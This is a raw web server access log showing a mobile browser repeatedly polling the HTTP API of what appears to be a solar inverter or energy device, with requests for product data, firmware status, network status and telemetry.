Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.13.124] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.13.124] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.13.124] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.13.124] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.13.124] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.13.124] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.13.124] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.13.124] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.13.124] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.13.124] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.13.124] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.13.124] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.13.124] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:40 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:40 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:40 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.13.124] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:45 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:45 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.13.124] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.13.124] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.13.124] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.13.124] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.13.124] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.13.124] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.13.124] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.13.124] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:55 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:55 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:32 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.10.113] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.10.113] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.10.113] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.10.113] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.10.113] [Length 1682] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.10.113] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.10.113] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.10.113] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.10.113] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.10.113] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.10.113] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:47:33 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.10.113] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.15.156] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:15 +0000] - 404 404 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.15.156] [Length 181] [Gzip 3.22] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.15.156] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.15.156] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.15.156] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.15.156] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.15.156] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.15.156] [Length 1685] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.15.156] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.15.156] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.15.156] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.15.156] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.15.156] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.15.156] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.15.156] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.15.156] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.15.156] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.15.156] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:17 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.15.156] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.15.156] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.15.156] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768345199999&bin=week_of_year&aggregation=diff" [Client 37.76.15.156] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:20 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/modbus_device_monitor/device/list" [Client 37.76.15.156] [Length 180] [Gzip 3.24] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:20 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.15.156] [Length 1679] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:20 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/grid_power_ctrl/obj/max_abs_active_power?scope=setting" [Client 37.76.15.156] [Length 22] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.15.156] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/measures" [Client 37.76.15.156] [Length 338] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/private/setup" [Client 37.76.15.156] [Length 111] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" 